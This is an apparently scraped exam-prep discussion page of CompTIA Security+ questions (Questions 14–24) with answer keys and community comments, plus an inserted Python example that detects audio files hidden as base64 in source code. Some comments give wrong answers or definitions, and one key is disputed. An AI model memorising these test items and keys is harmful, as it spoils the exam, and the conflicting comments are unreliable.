used with the FTP protocol, this allows for secure(SSH) file transfer(FTP) over the internet.
========================
Other Choices:
S/MIME (Secure/Multipurpose internet Mail Extensions) - Digitally signs and encrypts the contents of email messages.
LDAPS(Lightweight Directory Access Protocol) - Provides authentication for directory-based traffic
SRTP (Secure Real-time Transport Protocol) - Provides authentication/encryption for transmitted audio and video traffic.
upvoted 7 times

  uday1985 Most Recent  3 weeks, 4 days ago


I think it's D, but they messed up the letters: SFTP became SRTP!

I dare you who answered SSH to use the same answer when SFTP is next to it!
upvoted 1 times

  Moose777 3 weeks, 3 days ago


There is such a thing as SRTP...
upvoted 1 times

  Mr_BuCk3th34D 1 month ago


Actually, a better answer would be SFTP (SSH with FTP), but since this is not an alternative, I'll go with SSH.
upvoted 1 times

  lordguck 3 months ago


C: LDAPS (B) is for authentication but that does not answer the question about the data transfer. SSH on the other hand can do both e.g. with
user/password or better yet certificates.
upvoted 1 times

  be9z 3 months, 3 weeks ago


The answer is SSH. SSH can be used to transfer data from one computer to another over internet. And it is a secure connection
upvoted 1 times

  RawToast 3 months, 4 weeks ago


Selected Answer: C
SSH is a suite of three utilities. SSH: Secure Shell for secure connection and command execution. SCP: Secure Copy Protocol, and slogin:
enables secure login. Both ends of an SSH connection are encrypted. SSH would allow for all of the criteria to be met.
upvoted 2 times

  Mondicles 4 months, 2 weeks ago


Selected Answer: C
This is definitely C.
LDAP is used to provide a central place for directory service authentication.
S/MIME is an internet standard to digitally sign and encrypt email messages. It ensures the integrity of email messages remains intact while being
received.
SSH can be used with FTP which is called SFTP, file transfer over encrypted tunnel.
upvoted 4 times

  mark9999 5 months ago


LDAPS is for directory-based traffic and S/MIME for email traffic. Sending files to another server using SSH will achieve the aim. Try it out on
Linux-based machines.
upvoted 1 times

  monsteracid 4 months, 3 weeks ago


LDAPS is used for authentication ONLY. It does not perform any encryption of files.
upvoted 1 times

  Wiggie 5 months ago


LDAPS

https://library.netapp.com/ecmdocs/ECMP1366834/html/GUID-0E97E7F2-D46D-4883-B95B-A066B0D52B3D.html
upvoted 1 times

  Dachosenone 5 months ago


Selected Answer: C
You can transfer files from server to server using SSH.
https://tecadmin.net/download-file-using-ssh/
upvoted 2 times

  comeragh 5 months ago


On review it looks to be LDAPS. Other sites also saying LDAPS.
upvoted 1 times

  monsteracid 4 months, 3 weeks ago


LDAPS is used for authentication ONLY. It does not perform any encryption of files.
upvoted 1 times

  varun0 5 months ago


Selected Answer: C
S/MIME is the format used for email attachments, there is no way for the users to upload files to the directory and have it automatically sent to
the business partner. SSH can do this by sshing to the required directory and placing the files there. And having it sent using various ssh based
file transfer protocols like sftp, scp.
upvoted 4 times

  Wiggie 5 months ago


https://www.miniorange.com/guide-to-setup-ldaps-on-windows-server

https://www.techtarget.com/searchmobilecomputing/definition/LDAP
upvoted 2 times

  Wiggie 5 months ago


Selected Answer: B
Directory = LDAPS
upvoted 2 times

  Mondicles 4 months, 2 weeks ago


LDAP is used as an authentication protocol for directory services.
upvoted 1 times

  monsteracid 4 months, 3 weeks ago


LDAPS is used for authentication ONLY. It does not perform any encryption of files.
upvoted 2 times

  comeragh 5 months ago


Selected Answer: A
Going with S/MIME here for this one. It cannot be SSH. Be careful I am seeing wrong answers.
upvoted 3 times

  chuck165 5 months ago


This would be SSH via something like SCP. S/MIME is primarily for email and no way to choose a specific directory.
upvoted 3 times

  Ribeiro19 5 months ago


Guys, one question Why not SSH???
Can you send files with SSH?
It's based on the SSH protocol used with it. A client can use an SCP to upload files to a remote server safely, download files, or even transfer
files via SSH across remote servers.

https://www.google.com/url?
sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwiIoIH14vH5AhXFw4UKHYKRB28QFnoECBAQAw&url=https%3A%2F%2Fwww.freec
odecamp.org%2Fnews%2Fscp-linux-command-example-how-to-ssh-file-transfer-from-remote-to-
local%2F&usg=AOvVaw3r2nagt0bG8ZTEWs4LoREb&cshid=1661973013257536
upvoted 3 times

  MatterPacker 5 months ago


I also agree with you. Key phrase I see is "connection to business partner over the internet"
-It doesn't sound like S/MIME, because users are dropping the files off in a directory, not through email
-Although it mentions directory, I don't think it's LDAP. LDAP is a directory access protocol, an internal based thing for the main company,
it shouldn't extend outwards to business partners like that. https://youtu.be/0FwOcZNjjQA
upvoted 1 times

  KetReeb 5 months ago


A) Secure/Multipurpose Internet Mail Extensions - you do not use SSH for this process.
upvoted 1 times

  monsteracid 4 months, 3 weeks ago


S/MIME is used for mail exchange. This question is about centralized file storage that can securely upload to. SSH is the only correct
option of the 4 listed.
upvoted 1 times

Question #15 Topic 1

An administrator needs to protect user passwords and has been advised to hash the passwords. Which of the following BEST describes what the
administrator is being advised to do?

A. Perform a mathematical operation on the passwords that will convert them into unique strings.

B. Add extra data to the passwords so their length is increased, making them harder to brute force.

C. Store all passwords in the system in a rainbow table that has a centralized location.

D. Enforce the use of one-time passwords that are changed for every login session.

Correct Answer: A

Community vote distribution


A (95%) 5%

  varun0 Highly Voted  5 months ago


Selected Answer: A
A 100% sure
upvoted 9 times

  DALLASCOWBOYS Most Recent  6 days, 14 hours ago


A. is the definition of hashing
upvoted 1 times

  xxxdolorxxx 2 weeks, 3 days ago


Selected Answer: A
A.
Hashing pushes the data through a one way algorithm resulting in a string that you can use to compare against the original value.
All other answers don't really make any sense.
upvoted 1 times

  KingDrew 3 weeks, 4 days ago


Selected Answer: A
Basically a cryptography method.
upvoted 1 times

  whiteLightning0820 3 months, 1 week ago


Selected Answer: A
ITS A FO SHO
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago


Selected Answer: A
It is A

Option B would be salting.


upvoted 1 times

  Mondicles 4 months, 2 weeks ago


This question wants to test if you know the definition of a hash function, which is described in OPTION A.
upvoted 2 times

  FT1 5 months ago


A - What's Hashing About?

By dictionary definition, hashing refers to "chopping something into small pieces" to make it look like a "confused mess". That definition closely
applies to what hashing represents in computing.

In cryptography, a hash function is a mathematical algorithm that maps data of any size to a bit string of a fixed size. We can refer to the function
input as message or simply as input. The fixed-size string function output is known as the hash or the message digest. As stated by OWASP,
hash functions used in cryptography have the following key properties:
upvoted 2 times

  dj450 5 months ago


Selected Answer: A
Admin is being advised to hash. A is the definition of hashing
upvoted 2 times
  Ribeiro19 5 months ago


Selected Answer: A
Guys, don't invent the wheel again. The question is stating what they told the guy to do! That is hashing. And answer A is the definition of a
hash. You can find it on Google.
upvoted 3 times

  examprepkt 5 months ago


Seems like B would be the best option,

What is password salting? Password salting is a technique to protect passwords stored in databases by adding a string of 32 or more characters
and then hashing them. Salting prevents hackers who breach an enterprise environment from reverse-engineering passwords and stealing them
from the database.

https://www.techtarget.com/searchsecurity/definition/salt
upvoted 2 times

  Mondicles 4 months, 2 weeks ago


Option A literally defines what a hash is. Read the question carefully.
upvoted 3 times

  stoneface 5 months ago


You are not adding any data when you are hashing - adding randomized value 'salting'
upvoted 3 times

  KetReeb 5 months ago


A - Common uses of hashing algorithms are to store computer passwords and to ensure message integrity. The idea is that hashing can produce
a unique value that corresponds to the data entered, but the hash value is also reproducible by anyone else running the same algorithm against
the data.
upvoted 3 times

  comeragh 5 months ago


Selected Answer: B
B here for me seems the one that fits best.
upvoted 1 times

  Ay_ma 5 months ago


That's 'salting'. The question didn't indicate that anything was added to the process.
upvoted 3 times

Question #16 Topic 1

Which of the following would be indicative of a hidden audio file found inside of a piece of source code?

A. Steganography

B. Homomorphic encryption

C. Cipher suite

D. Blockchain

Correct Answer: A

Community vote distribution


A (100%)

  Ribeiro19 Highly Voted  5 months ago


Selected Answer: A
Steganography is the art of putting information inside of information. It's like hiding something in front of everyone's eyes.
upvoted 8 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Steganography is the technique of hiding secret data within an ordinary, non-secret, file or message in order to avoid detection. It's essentially
being able to hide in plain sight. The question is referring to a hidden file not some form of encryption, Steganography is not an encryption
method but can be used with encryption to add an extra step for protecting data.

==============================
Other Choices:
Homomorphic encryption - An encryption algorithm designed to allow calculations to be performed on the encrypted data without requiring
access to a secret key to decrypt the data. The result of such a computation remains in encrypted form, and can at a later point, the original data
can be accessed with the proper decryption key. This allows critical and sensitive data to be outsourced to third-parties without posing a serious
risk to the original owner of that data.

Cipher suite - Algorithms/Instructions required to enable secure network connections between servers and clients through TLS(SSL).

Blockchain - A shared, immutable ledger that facilitates the process of recording transactions and tracking assets in a business network.
upvoted 6 times

  DALLASCOWBOYS Most Recent  6 days, 14 hours ago


A. Steganography, which is the art of using cryptographic techniques to embed secret messages within another file.
upvoted 1 times

  KingDrew 3 weeks, 4 days ago


Selected Answer: A
Steganography = Hiding secret data within other data
In this case, secret audio file is hidden within source code data
upvoted 1 times

  batuhanzeyad 4 weeks ago


Selected Answer: A
This is the right answer
upvoted 1 times

  mr_reyes 1 month, 3 weeks ago


Sooooo many of these are "A", and I believe it is right here also.
upvoted 1 times

  nukimoya 2 months ago


A is the right answer
upvoted 1 times

  whiteLightning0820 3 months, 1 week ago


Selected Answer: A
I think its A
upvoted 1 times

  rindrasakti 3 months, 3 weeks ago


Of course steganography, A

upvoted 1 times
  comeragh 5 months ago
Selected Answer: A
Agree with A on this one
upvoted 1 times

  IQ30 5 months ago


Selected Answer: A
Professor Messer notes :
Other steganography types
• Audio steganography
– Modify the digital audio file
– Interlace a secret message within the audio
– Similar technique to image steganography
upvoted 2 times
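The question asks what a hidden audio file inside source code would indicate; the practitioner's follow-up is how you would spot one. The block below is an added example, not code from the ExamTopics page: it scans source text for long base64 runs and checks whether they decode to a common audio container header (WAV, Ogg, FLAC, MP3). The "source file" it scans is constructed, and the embedded blob is a minimal 44-byte WAV header rather than real audio.

```python
"""Spotting an audio file hidden in source code: long base64 runs that
decode to an audio container header.

Added example (not from the page). Sample source and WAV header are
constructed for the demo.
"""
import base64
import re

# Long runs of the base64 alphabet; legitimate code rarely carries these
# outside embedded data, fixtures or keys, so they are worth decoding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def classify_audio(data: bytes):
    """Return a label if the bytes start like a common audio container."""
    if data[:4] == b"RIFF" and data[8:12] == b"WAVE":
        return "wav"
    if data[:4] == b"OggS":
        return "ogg"
    if data[:4] == b"fLaC":
        return "flac"
    if data[:3] == b"ID3":
        return "mp3"
    if len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0:
        return "mp3"   # bare MPEG frame sync; heuristic, can false-positive
    return None


def find_hidden_audio(source: str):
    """Return (line number, kind, decoded size) for each suspicious blob."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in B64_RUN.finditer(line):
            try:
                blob = base64.b64decode(m.group(0), validate=True)
            except ValueError:
                continue   # looked like base64 but was not
            kind = classify_audio(blob)
            if kind:
                hits.append((lineno, kind, len(blob)))
    return hits


def _minimal_wav_header() -> bytes:
    """Canonical 44-byte PCM WAV header with an empty data chunk (constructed)."""
    fmt = (b"fmt " + (16).to_bytes(4, "little")
           + (1).to_bytes(2, "little") + (1).to_bytes(2, "little")       # PCM, mono
           + (8000).to_bytes(4, "little") + (16000).to_bytes(4, "little")  # rate, byte rate
           + (2).to_bytes(2, "little") + (16).to_bytes(2, "little"))       # align, bits
    data = b"data" + (0).to_bytes(4, "little")
    return b"RIFF" + (36).to_bytes(4, "little") + b"WAVE" + fmt + data


# Constructed "source code": one innocent blob (base64 JSON config) and one
# hidden WAV parked in a variable that looks like a license key.
SAMPLE_SOURCE = "\n".join([
    "import json",
    'CONFIG = json.loads(base64.b64decode("'
    + base64.b64encode(b'{"debug": false, "retries": 3, "region": "eu"}').decode() + '"))',
    "",
    "def activate(key):",
    "    return key == LICENSE",
    "",
    'LICENSE = "' + base64.b64encode(_minimal_wav_header()).decode() + '"',
])
```

The JSON blob on line 2 is decoded and discarded because its first byte is `{`; only the blob on line 7 matches a container signature. Magic-byte checks catch the lazy cases; a payload that has been encrypted or bit-spread across real image or audio data needs statistical analysis, which is a separate tool.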

Question #17 Topic 1

A user enters a username and a password at the login screen for a web portal. A few seconds later the following message appears on the screen:
Please use a combination of numbers, special characters, and letters in the password field.
Which of the following concepts does this message describe?

A. Password complexity

B. Password reuse

C. Password history

D. Password age

Correct Answer: A

Community vote distribution


A (100%)

  Ribeiro19 Highly Voted  5 months ago


Selected Answer: A
Password complexity is the method that obligates users to use passwords with certain characteristics (like more than X characters, using
numbers, symbols and letters).
upvoted 8 times

  comeragh Highly Voted  5 months ago


Selected Answer: A
A correct answer here
upvoted 5 times

  DALLASCOWBOYS Most Recent  6 days, 14 hours ago


A. Making passwords more complex makes them harder to crack
upvoted 1 times

  alwaysrollin247 1 month, 4 weeks ago


CompTIA is frustrating. My first thought here is that, this user is logging in not creating an account which would tell me this is the password age
expiring. However, the question asks what the message describes which, leaving out the rest of the question, the message itself describes
complexity.
upvoted 1 times

Question #18 Topic 1

A company recently experienced an inside attack using a corporate machine that resulted in data compromise. Analysis indicated an unauthorized
change to the software circumvented technological protection measures. The analyst was tasked with determining the best method to ensure the
integrity of the systems remains intact and local and remote boot attestation can take place. Which of the following would provide the BEST
solution?

A. HIPS

B. FIM

C. TPM

D. DLP

Correct Answer: C

Community vote distribution


C (94%) 6%

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: C
In this question, an attack has already occurred so preventative measures such as HIPS, FIM, or DLP would not be helpful. Also, the analyst
wants to check the integrity of the system, and boot attestation can take place. TPM chips have mechanisms to prevent system tampering and
boot attestation can be done with TPM based hardware to verify the state of the firmware, bootloader, etc. TPM is the best option here.

=====================
Other Choices
HIPS (Host Intrusion Prevention System) - An installed software package which monitors a single host for suspicious activity by analyzing events
occurring within that host. This aims to stop malware by monitoring the behavior of code.

FIM (File Integrity Monitoring) - Technology that monitors and detects file changes that could be indicative of a cyberattack. FIM specifically
involves examining files to see if and when they change, how they change, who changed them, and what can be done to restore those files if
those modifications are unauthorized.

DLP (Data Loss Prevention) - A set of tools and processes used to ensure that sensitive data is not lost, misused, or accessed by unauthorized
users.
upvoted 20 times

  ELLEWOODS45 2 months, 3 weeks ago


I wish there was a way we could chat with each other, do y’all have a way you communicate ?
upvoted 6 times

  Ay_ma Highly Voted  5 months ago


The key sentence in the question is: "The analyst was tasked with determining the best method to ensure the integrity of the systems remains
intact and local and remote boot attestation can take place"

The attack already happened. 'HIPS' looks out for attacks. But in the situation of trying to restore, TPM seems like the best option.
upvoted 10 times

  DALLASCOWBOYS Most Recent  6 days, 14 hours ago


C. TPM which is the Trusted Platform Module, which helps prevent unauthorized changes to firmware or software
upvoted 1 times

  mlonz 2 weeks, 6 days ago


A trusted platform module is a hardware chip included on many laptops and mobile devices. It provides full disk encryption
and supports a secure boot process and remote attestation. A TPM includes a unique RSA asymmetric key burned into the
chip that provides a hardware root of trust
upvoted 1 times

  nerdboy1992 1 month, 2 weeks ago


Though File Integrity Monitoring (FIM) detects any changes to software, it wouldn't be correct in this instance. This is due to the question stating
"remote boot attestation". Trusted Platform Module (TPM) provides this feature.
upvoted 1 times

  okay123 2 months, 3 weeks ago


Remote attestation: - Device provides an operational report to a verification server
- Encrypted and digitally signed with a TPM

So before a remote boot attestation can take place, TPM chips are needed
upvoted 2 times

  Check_mate 3 months ago


Selected Answer: B
It's clearly FIM; it's a security practice for ensuring integrity. TPM is a Trusted Platform Model for securing the cryptoprocess.
upvoted 2 times

  Sandon 1 week, 1 day ago


It's clearly not
upvoted 1 times

  Mondicles 4 months, 2 weeks ago


Selected Answer: C
The answer is C.
TPM protects the device against unauthorized firmware and software modification by hashing critical sections of firmware and software.
upvoted 2 times

  comeragh 5 months ago


Selected Answer: C
Sorry my earlier comment suggested HIPS. On further reading going with C - TPM
upvoted 2 times

  Ribeiro19 5 months ago


Selected Answer: C
check this out guys https://docs.microsoft.com/en-us/azure/security/fundamentals/measured-boot-host-attestation
upvoted 1 times

  varun0 5 months ago


Selected Answer: C
Remote boot attestation can only be done with something called measured boot, which takes the hashes of the firmware, drivers and OS and stores
them in the TPM, from where the admin can remotely ensure the integrity of the system and be sure that it has not changed.
upvoted 4 times

  Wiggie 5 months ago


Selected Answer: C
Right answer
upvoted 2 times

  comeragh 5 months ago


Definitely not C (TPM). I agree with HIPS here being the correct answer.
upvoted 1 times

  inkedia3 5 months, 1 week ago


By definition HIPS is an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that
host. In other words a Host Intrusion Prevention System (HIPS) aims to stop malware by monitoring the behavior of code. This makes it possible
to help keep your system secure without depending on a specific threat to be added to a detection update.
Answer A is my choice
upvoted 4 times

  inkedia3 5 months, 1 week ago


The right answer is TPM. My initial choice is wrong Answer C.
upvoted 7 times

Question #19 Topic 1

Which of the following is a reason to publish files' hashes?

A. To validate the integrity of the files

B. To verify if the software was digitally signed

C. To use the hash as a software activation key

D. To use the hash as a decryption passphrase

Correct Answer: A

Community vote distribution


A (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: A
A seems obvious to me.
upvoted 7 times

  securityexam101 Highly Voted  4 months, 4 weeks ago


Hashes = Integrity always
upvoted 5 times

  DALLASCOWBOYS Most Recent  6 days, 14 hours ago


A. Publishing hashes allows the comparison of hash values to verify integrity
upvoted 1 times

  GetBuckets 2 months ago


I believe it's 'B'. Software vendors publish the hashes of their software products so the end users (in case they downloaded the software from
3rd-party websites) can verify if the software has not been tampered with (added malware or malicious code). Digital signatures use hashes.
upvoted 1 times

  TinyTrexArmz 1 week, 1 day ago


But a hash does not prove that it was digitally signed. You take a plain txt file and, using a hash generator, create a hash for it. If I then share
the text file with you and you wanted to make sure what is currently in the text file is the same as what I sent you then you'd use a compatible
hash generator to generate a hash for the file you received. If our hashes match then the file wasn't changed. If the hash is different then
something happened in transit and you can't trust that txt file. To accomplish this I didn't have to digitally sign it or encrypt it or anything. Just
share the file with you along with my original hash.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
To validate the integrity of the files - Hash function algorithms compares the file's original and current hash values. And if a byte or even a piece
of the file's data has been changed, the original and current hash values will be different, and therefore you will know whether it's the same file or
not.
upvoted 2 times

  lordguck 3 months, 1 week ago


"A" is right obviously, but I have a question training dump from Oct/22 which says "B" (rubbish if you ask me).
upvoted 1 times

  Ribeiro19 5 months ago


Selected Answer: A
To validate the integrity of the files
upvoted 2 times

  stoneface 5 months ago


Selected Answer: A
A - hashing
upvoted 3 times

  comeragh 5 months ago


Selected Answer: A
Agree with A being correct answer here
upvoted 1 times

Question #20 Topic 1

A security manager has tasked the security operations center with locating all web servers that respond to an unsecure protocol. Which of the
following commands could an analyst run to find the requested servers?

A. nslookup 10.10.10.0

B. nmap -p 80 10.10.10.0/24

C. pathping 10.10.10.0 -p 80

D. ne -l -p 80

Correct Answer: B

Community vote distribution


B (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: B
nmap is looking for the unsecure port 80 (http), pathping only shows packet drops and latency.
upvoted 11 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: B
Answer: nmap -p 80 10.10.10.0/24 - Nmap or network mapper is a network discovery and security auditing tool mainly used to find services,
hosts, and open ports on a network. In this case, nmap will check for the HTTP port 80.
====================================
Other Choices
Nslookup - This command queries DNS servers to obtain DNS records
Pathping - This command provides information about network latency and packet loss at hops between a source and destination. Used for
troubleshooting network issues.
ne - Honestly not 100% here
upvoted 7 times

  TinyTrexArmz 1 week, 1 day ago


I agree the answer is nmap but I'll also say that the command would not find "all web servers" It would only find web servers on the
10.10.10.0/24 subnet.

Because of this fact and my not being familiar with that "ne" command, I chose it initially. Which I think is why it's there. To trick people like
me that get hung up on the word phrase "all web servers." As far as my search goes, I've not found a system that uses the "ne" command.
upvoted 1 times

  xxxdolorxxx Most Recent  2 weeks ago


Selected Answer: B
Nmap seems right to me. Done this a number of times when going for my eJPT.
upvoted 1 times

  comeragh 5 months ago


Selected Answer: B
B correct here
upvoted 4 times

  stoneface 5 months, 1 week ago


Selected Answer: B
b) nmap -p 80 10.10.10.0/24 ->
upvoted 4 times

Question #21 Topic 1

Which biometric error would allow an unauthorized user to access a system?

A. False acceptance

B. False entrance

C. False rejection

D. False denial

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
FAR ( False Acceptance Rate ) ->

where an interloper is accepted (Type II error or false match rate [FMR]). FAR is measured as a percentage.
False rejection cause inconvenience to users, but false acceptance can lead to security breaches, and so is usually considered the most
important metric.
upvoted 14 times

  varun0 Highly Voted  5 months ago


Selected Answer: A
False Acceptance Rate - accepts wrong info
upvoted 5 times

  DALLASCOWBOYS Most Recent  6 days, 13 hours ago


A. False acceptance allows unauthorized user and accepts them as valid.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
False Acceptance - There are only two metrics that are used to determine the performance of biometrics: FAR (False Acceptance Rate) & FRR
(False Rejection Rate). False Acceptance Rate is a metric for biometric performance that determines the number of instances where unauthorized
persons were incorrectly authorized. For this question, a biometric error would mean that someone was authorized when they weren't supposed
to be authorized.
upvoted 4 times

Question #22 Topic 1

A company is auditing the manner in which its European customers' personal information is handled. Which of the following should the company
consult?

A. GDPR

B. ISO

C. NIST

D. PCI DSS

Correct Answer: A

Community vote distribution


A (100%)

  comeragh Highly Voted  5 months ago


Selected Answer: A
GDPR correct here
upvoted 10 times

  secplusme 4 months, 1 week ago


GDPR is countries in the EU not all of Europe
upvoted 1 times

  varun0 Highly Voted  5 months ago


Selected Answer: A
GDPR - Privacy law for Europeans citizens
upvoted 6 times

  DALLASCOWBOYS Most Recent  6 days, 13 hours ago


A. GDPR is the General Data Protection Regulation implements security and privacy requirements for personal info of European residents
worldwide.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: GDPR - General Data Protection Regulation is a regulation in EU laws that requires businesses to protect the personal data and privacy
of EU citizens for transactions that occur within EU member states.
==============================
Other Choices:
ISO (International Organization for Standardization) - An independent, non-governmental organization that develops standards to ensure the
quality, safety and efficiency of products, services and systems.

NIST (National Institute of Standards and Technology) - A non-regulatory US government agency created to develop cybersecurity standards,
guidelines, best practices, and other resources to meet the needs of U.S. industry, federal agencies and the broader public.

PCI DSS (Payment Card Industry Data Security Standard) - A set of security standards for organizations that handle credit cards from major card
schemes.
upvoted 3 times

  grinop 3 months, 2 weeks ago


From what I see Global Data Protection Regulations is EU but not sure all of Europe
upvoted 1 times

  ExamTopicsDiscussor 4 months, 1 week ago


GDPR is for Europe.
upvoted 1 times

Question #23 Topic 1

Which of the following are common VoIP-associated vulnerabilities? (Choose two.)

A. SPIM

B. Vishing

C. Hopping

D. Phishing

E. Credential harvesting

F. Tailgating

Correct Answer: AB

Community vote distribution


BE (64%) BC (17%) Other

  k9_462 Highly Voted  5 months ago


Selected Answer: BE
After heavy consideration and reading through multiple Sec+ books, I'm kinda going with B & D, vishing and credential harvesting, as being the
most common attacks, as hopping doesn't ever seem to come up in the material.

https://fitsmallbusiness.com/voip-security-threats/
upvoted 20 times

  k9_462 5 months ago


Although they don't specifically mention VOMIT, a common result of VOMIT would be credential harvesting.

"VOMIT, is a VoIP hacking technique that extracts confidential data and voice packets directly from calls. VOMIT works by eavesdropping on
phone calls and converting phone conversations into files straight from your business phone system. This makes it easy to obtain company
information, including usernames, passwords, bank details, phone numbers, and call origin."
upvoted 7 times

  serginljr Highly Voted  5 months ago


Hopping does not exist in exam objectives
upvoted 15 times

shi_ Most Recent 3 days, 8 hours ago
Selected Answer: BE
Hopping doesn't exist in the exam options.
For me, I answered B and E.
upvoted 1 times

pwino 3 days, 21 hours ago
SPIM (Spam over Internet Telephony) is a type of spam that is sent over Voice over IP (VoIP) networks. It is a threat to VoIP systems just like email
spam is a threat to email systems. Vishing (Voice Phishing) is an attack where an attacker uses VoIP to impersonate a trusted entity and attempt
to steal sensitive information such as passwords, credit card numbers, or other personal information. Both of these attacks target the users of
VoIP systems and are common vulnerabilities associated with VoIP.

The correct answers are A and B.
upvoted 2 times

DALLASCOWBOYS 6 days, 13 hours ago
B and E. VoIP is Voice over Internet Protocol. Vishing is phishing over the phone. E, credential harvesting, is the process of gathering credentials
like usernames and passwords. Credential harvesting is often performed in phishing attacks, which is what vishing is.
upvoted 1 times

EricShon 1 week, 5 days ago
Selected Answer: AB
A. SPIM (Spam over Internet Telephony) and B. Vishing (Voice Phishing) are common VoIP-associated vulnerabilities.

SPIM is a form of spam that is delivered over VoIP networks. It is similar to email spam and can be used to deliver unwanted messages, such as
advertisements, phishing attempts, and malware.

Vishing is a type of social engineering attack that uses VoIP technology to make phone calls or leave voice messages with the goal of tricking
individuals into providing personal or financial information. This is done by spoofing the caller ID, making it appear as if the call is coming from a
legitimate source, such as a bank or government agency.
upvoted 2 times

hsdj 1 week, 1 day ago
SPIM is spam over instant messaging.
upvoted 1 times

sarah2023 2 days, 22 hours ago
This is the correct definition according to CompTIA, however, examples of instant messaging platforms are Zoom, Skype, Messenger etc
which also support VoIP. This leads me to agree with EricShon that the correct answer is AB. Seems more of a straightforward logic to me
compared to agreeing with credential harvesting but please take it with a pinch of salt.
upvoted 1 times

Sandon 1 week, 1 day ago
This is the correct answer
upvoted 1 times

zf1343 6 days, 6 hours ago
Yes, SIP is the protocol for some SPIM solutions.
upvoted 1 times

RvR109 2 weeks, 4 days ago
Selected Answer: BE
"Voice over Misconfigured Internet Telephones, or VOMIT as it's so colorfully referred to, presents a serious security threat for VoIP phone
systems. Hackers use this method to eavesdrop and extract voice packets directly from ongoing calls, thus gaining access to sensitive
information such as call origin, usernames and passwords and financial data."
Vishing is obvious.

https://www.cloudtalk.io/blog/9-voip-security-vulnerabilities-and-how-to-fix-them/
upvoted 1 times

tek7ila 2 months, 1 week ago
Selected Answer: BC
B - Vishing is obvious.
C - Hopping: if it's about VLAN hopping, then that's the answer.
upvoted 1 times

Nirmalabhi 2 months, 1 week ago
Selected Answer: BE
I'll also go with B: Vishing and E: Credential harvesting. Now, vishing is pretty obvious, but credential harvesting can be done in many ways, one of
which is social engineering, and hence can be attributed to a VoIP attack. The rest of the options do not indicate anything to do with a voice service attack.
Hopping is not part of the Sec+ objectives.
upvoted 2 times

Kalender 2 months, 1 week ago
Selected Answer: AC
Hopping (vlan hopping) is related to voice and data, i.e. VoIP.

Vishing is already a VoIP related topic

but SPIM is more related to text messaging (smishing vs vishing)

That's why I say the answer is A and C.
upvoted 1 times

asum 2 months, 2 weeks ago
SPIM should be SPIT. Then answer is A and B
upvoted 4 times

DALLASCOWBOYS 6 days, 13 hours ago
SPIM is a valid term: Spam over Internet Messaging. This is not a typo.
upvoted 1 times

fzorsqqmdmsvfqvqdv 1 month, 4 weeks ago
This. Agreed. C - hopping is not on the exam objectives.
Credential harvesting is too broad.

A / B - SPIT is the VoIP equivalent of spam.
upvoted 1 times

Comicbookman 2 months, 3 weeks ago
B. Vishing: Similar to e-mail phishing scams, another threat to keep an eye out for is vishing, or VoIP phishing. Much like its e-mail counterpart,
vishing lets hackers spoof caller ID and present a fraudulent phone identity. People who receive calls from a visher may be tricked into believing
they're talking to their bank or another legitimate institution, causing them to share sensitive information.
C. VoIP hopping: Next in line is VoIP hopping, which can enable remote eavesdropping, but more critically compromises VLANs, which were previously trusted
as providing a secure VoIP environment. VoIP hopping can enable a PC to mimic an IP phone, giving hackers the inroads to access the VoIP
system.
upvoted 1 times

whiteLightning0820 3 months, 1 week ago
Selected Answer: BE
I thought B and E
upvoted 3 times

DoDaResearch 3 months, 1 week ago
Selected Answer: AB
Sticking with A and B as credential harvesting is an attempt to gain additional information after the initial attack vector has been exploited. With
the use of mobile devices over VoIP networks SPIM becomes an attack vector that can perform credential harvesting. The word common, weighs
heavily in my choices as both SPIM and Vishing are going to be more common than hopping or credential harvesting and both can be a doorway
to multiple attacks not mentioned. Always easier to get what you want just given to you. https://www.mimecast.com/blog/what-is-credential-
harvesting/ and https://www.avanan.com/blog/hello-this-is-credential-harvesting-calling I will test in the next 10 days and hope to pass.
upvoted 5 times

be9z 3 months, 2 weeks ago
The Answer is B and E. Vishing is simple to understand. Credentials Harvesting is the second answer. It can be an email attack where hackers
have found a way to leverage voicemail to email notifications to send credential harvesting pages.
upvoted 1 times

NXPERT 3 months, 2 weeks ago
Selected Answer: DC
IP phones and PCs are inline in most corporates; hopping between the vVLAN and dVLAN is a very common VoIP attack.
upvoted 1 times

[Removed] 3 months, 3 weeks ago
Selected Answer: BE
Hopping is a method of testing VoIP security
upvoted 2 times

Question #24 Topic 1

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

A. Persistence

B. Buffer overflow

C. Privilege escalation

D. Pharming

Correct Answer: C

Community vote distribution


C (95%) 5%

varun0 Highly Voted 5 months ago
Selected Answer: C
Exploitation of an interactive process is the command line, from where exploits can be run to gain root permissions in a system.
upvoted 15 times

DALLASCOWBOYS Most Recent 6 days, 13 hours ago
C. Privilege Escalation seeks to increase the level of access that a user normally doesn't have. A restricted access area is an increased level of
access.
upvoted 1 times

xxxdolorxxx 2 weeks ago
Selected Answer: C
Priv esc.
upvoted 1 times

NICKJONRIPPER 2 months, 2 weeks ago
Selected Answer: B
Interactive means input; gaining a restricted area means modifying memory that is not allowed to the application, which is a buffer overflow. There is no
mention of gaining another account (privilege escalation).
upvoted 1 times

Sandon 3 weeks ago
That ain't it
upvoted 3 times

NICKJONRIPPER 2 months, 2 weeks ago
The key is gaining an "area", not gaining an "account".
upvoted 1 times

FMMIR 2 months, 2 weeks ago
Selected Answer: C
With Privilege Escalation, hackers can use a NON-INTERACTIVE program (application) to gain access. Privilege escalation happens when a
malicious user exploits a bug, design flaw, or configuration error in an APPLICATION (either a batch program or an interactive program) or
OPERATING SYSTEM utility program to gain elevated access to resources that should normally be unavailable to that user.
upvoted 1 times

comeragh 4 months, 1 week ago
Selected Answer: C
Agree with C here being the correct answer
upvoted 1 times

